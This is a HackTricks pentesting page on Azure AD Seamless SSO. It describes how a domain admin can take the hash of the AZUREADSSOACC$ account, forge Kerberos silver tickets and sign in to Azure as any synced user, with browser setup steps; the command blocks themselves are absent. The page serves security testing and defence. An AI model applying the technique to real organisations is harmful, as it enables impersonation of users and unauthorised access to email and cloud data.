Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!

Get the official PEASS & HackTricks swag

Discover The PEASS Family, our collection of exclusive NFTs

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

From the docs: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically signs users in when they are on their corporate devices connected to your corporate network. When enabled, users don't need to type in their passwords to sign in to Azure AD, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components.

Basically Azure AD Seamless SSO signs users in when they are on a on-prem domain joined PC.

It's supported by both PHS (Password Hash Sync) and PTA (Pass-through Authentication).

Desktop SSO is using Kerberos for authentication. When configured, Azure AD Connect creates a computer account called AZUREADSSOACC$ in on-prem AD. The password of the AZUREADSSOACC$ account is sent as plain-text to Azure AD during the configuration.

The Kerberos tickets are encrypted using the NTHash (MD4) of the password and Azure AD is using the sent password to decrypt the tickets.

Azure AD exposes an endpoint (https://autologon.microsoftazuread-sso.com) that accepts Kerberos tickets. Domain-joined machine's browser forwards the tickets to this endpoint for SSO.

The password of the user AZUREADSSOACC$ never changes. Therefore, a domain admin could compromise the hash of this account, and then use it to create silver tickets to connect to Azure with any on-prem user synced:

With the hash you can now generate silver tickets:

To utilize the silver ticket, the following steps should be executed:

Initiate the Browser: Mozilla Firefox should be launched.

Configure the Browser:

Navigate to about:config.

Set the preference for network.negotiate-auth.trusted-uris to the specified values:

https://aadg.windows.net.nsatc.net

https://autologon.microsoftazuread-sso.com

Access the Web Application:

Visit a web application that is integrated with the organization's AAD domain. A common example is Office 365.

Authentication Process:

At the logon screen, the username should be entered, leaving the password field blank.

To proceed, press either TAB or ENTER.

This doesn't bypass MFA if enabled

If the Active Directory administrators have access to Azure AD Connect, they can set SID for any cloud-user. This way Kerberos tickets can be created also for cloud-only users. The only requirement is that the SID is a proper SID.

Changing SID of cloud-only admin users is now blocked by Microsoft. For info check https://aadinternals.com/post/on-prem_admin/

Anyone that can manage computer accounts (AZUREADSSOACC$) in the container or OU this account is in, it can configure a resource based constrained delegation over the account and access it.

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso

https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/

https://aadinternals.com/post/on-prem_admin/

TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!

Get the official PEASS & HackTricks swag

Discover The PEASS Family, our collection of exclusive NFTs

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Last updated 5 months ago